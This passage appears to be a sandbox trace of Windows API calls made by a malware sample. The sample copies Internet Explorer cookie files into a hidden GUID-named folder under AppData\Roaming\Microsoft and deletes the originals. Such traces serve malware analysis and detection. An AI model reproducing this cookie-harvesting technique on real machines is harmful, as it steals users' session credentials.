(lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\HF8F6LU0.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\hf8f6lu0.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\HF8F6LU0.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\hf8f6lu0.txt"), bFailIfExists=0) returned 1 [0252.523] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\HF8F6LU0.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\hf8f6lu0.txt")) returned 1 [0252.524] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.524] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.524] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.525] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.525] StrChrW (lpStart="Low\\HTVL5WIW.txt", wMatch=0x74c005c) returned="\\HTVL5WIW.txt" [0252.525] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.525] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.525] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.525] StrChrW (lpStart="HTVL5WIW.txt", wMatch=0x74c005c) returned 0x0 [0252.525] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="HTVL5WIW.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\HTVL5WIW.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\HTVL5WIW.txt" [0252.525] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\HTVL5WIW.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\htvl5wiw.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\HTVL5WIW.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\htvl5wiw.txt"), bFailIfExists=0) returned 1 [0252.530] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\HTVL5WIW.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\htvl5wiw.txt")) returned 1 [0252.531] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.531] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.531] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.531] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.531] StrChrW (lpStart="Low\\ILF13HLB.txt", wMatch=0x74c005c) returned="\\ILF13HLB.txt" [0252.531] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.531] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.531] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.531] StrChrW (lpStart="ILF13HLB.txt", wMatch=0x74c005c) returned 0x0 [0252.531] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="ILF13HLB.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\ILF13HLB.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\ILF13HLB.txt" [0252.531] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\ILF13HLB.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\ilf13hlb.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\ILF13HLB.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\ilf13hlb.txt"), bFailIfExists=0) returned 1 [0252.536] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\ILF13HLB.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\ilf13hlb.txt")) returned 1 [0252.537] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.537] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.537] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.537] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.537] StrChrW (lpStart="Low\\ISTFXHHR.txt", wMatch=0x74c005c) returned="\\ISTFXHHR.txt" [0252.537] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.537] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.537] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.537] StrChrW (lpStart="ISTFXHHR.txt", wMatch=0x74c005c) returned 0x0 [0252.538] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="ISTFXHHR.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\ISTFXHHR.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\ISTFXHHR.txt" [0252.538] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\ISTFXHHR.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\istfxhhr.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\ISTFXHHR.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\istfxhhr.txt"), bFailIfExists=0) returned 1 [0252.543] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\ISTFXHHR.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\istfxhhr.txt")) returned 1 [0252.544] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.544] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.544] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.544] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.544] StrChrW (lpStart="Low\\ITD4OUAR.txt", wMatch=0x74c005c) returned="\\ITD4OUAR.txt" [0252.544] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.544] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.544] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.544] StrChrW (lpStart="ITD4OUAR.txt", wMatch=0x74c005c) returned 0x0 [0252.544] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="ITD4OUAR.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\ITD4OUAR.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\ITD4OUAR.txt" [0252.544] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\ITD4OUAR.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\itd4ouar.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\ITD4OUAR.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\itd4ouar.txt"), bFailIfExists=0) returned 1 [0252.549] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\ITD4OUAR.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\itd4ouar.txt")) returned 1 [0252.550] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.550] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.550] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.550] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.550] StrChrW (lpStart="Low\\J4JSQG9R.txt", wMatch=0x74c005c) returned="\\J4JSQG9R.txt" [0252.550] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.550] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.550] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.550] StrChrW (lpStart="J4JSQG9R.txt", wMatch=0x74c005c) returned 0x0 [0252.550] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="J4JSQG9R.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\J4JSQG9R.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\J4JSQG9R.txt" [0252.550] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\J4JSQG9R.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\j4jsqg9r.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\J4JSQG9R.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\j4jsqg9r.txt"), bFailIfExists=0) returned 1 [0252.555] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\J4JSQG9R.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\j4jsqg9r.txt")) returned 1 [0252.556] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.556] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.556] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.557] lstrcatW (in: 